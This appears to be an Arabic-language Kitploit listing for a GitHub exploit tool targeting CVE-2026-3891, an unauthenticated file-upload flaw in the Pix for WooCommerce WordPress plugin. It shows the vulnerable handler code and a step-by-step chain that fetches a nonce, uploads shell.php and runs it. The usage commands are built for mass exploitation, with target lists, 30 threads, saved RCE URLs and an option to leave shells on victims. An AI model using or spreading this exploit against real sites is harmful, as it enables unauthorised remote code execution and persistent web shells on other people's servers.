Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-3891 — Pix for WooCommerce رفع ملفات دون مصادقة عبر معلمة certificate_crt_path | CVSS 9.8 | Kitploit
أدوات/GitHubGitHub/shinthink/cve-2026-3891
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubshinthink/cve-2026-3891

CVE-2026-3891

Pix for WooCommerce رفع ملفات دون مصادقة عبر معلمة certificate_crt_path | CVSS 9.8

عرض المستودع
41منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-3891 — ثغرة RCE عبر رفع ملفات بدون مصادقة في Pix for WooCommerce

تسريب Nonce → رفع certificate_crt_path → تنفيذ الأكواد


نظرة عامة

CVE-2026-3891 هي ثغرة رفع ملفات عشوائية بدون مصادقة بخطورة حرجة (CVSS 9.8) في إضافة Pix for WooCommerce الخاصة بووردبريس (من linknacional) بالإصدارات ≤ 1.5.0.

يحتوي معالج AJAX الخاص بـ lkn_pix_for_woocommerce_c6_save_settings على:

  1. لا يوجد أي فحص للصلاحيات — يمكن لأي زائر غير مصادق استدعاءه
  2. لا يوجد تحقق من نوع الملف — يتم قبول أي امتداد ملف عبر معامل certificate_crt_path
  3. يمكن الحصول على nonce صالح بحرية عبر نقطة النهاية lkn_pix_for_woocommerce_generate_nonce بدون مصادقة

تُخزَّن الملفات المرفوعة في الدليل المتاح عبر الويب /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/.

الإصدارات المتأثرة

الإصدارالحالة
≤ 1.5.0متأثر
1.6.0+مصحَّح

اكتُشفت بواسطة: Alexis Lafontaine عبر Wordfence (13 مارس 2026)


آلية الثغرة

السبب الجذري

root@kitploit:~
// Nonce generated without auth
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);

// Upload handler — no capability check, no file type validation
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
function c6_save_settings() {
    // No current_user_can() check
    // No wp_check_filetype() call
    move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
}

سلسلة الهجوم

root@kitploit:~
1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
   → Get valid nonce (no auth needed)
2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
   → Upload shell.php via certificate_crt_path field
3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
   → RCE

التثبيت

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-3891.git
cd CVE-2026-3891
pip install -r requirements.txt

الاستخدام

root@kitploit:~
python cve_2026_3891.py -t target.com
python cve_2026_3891.py -f targets.txt -o shells.txt
python cve_2026_3891.py -t target.com --debug --no-cleanup

الوسائط

root@kitploit:~
  -t, --target      Single target
  -f, --file        Target list
  -o, --output      Save RCE URLs
  --threads         Workers (default: 30)
  --no-cleanup      Leave shells on target
  --debug           Show every request
  -v, --verbose     Verbose output

إخلاء المسؤولية

لأغراض التعليم والاختبار المصرَّح بهما فقط. لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام.


المراجع

الموردالرابط
تنبيه Wordfencewordfence.com
إدخال NVDCVE-2026-3891
الباحثAlexis Lafontaine

غير تابعة لـ linknacional أو Pix for WooCommerce.

تنزيل الأداة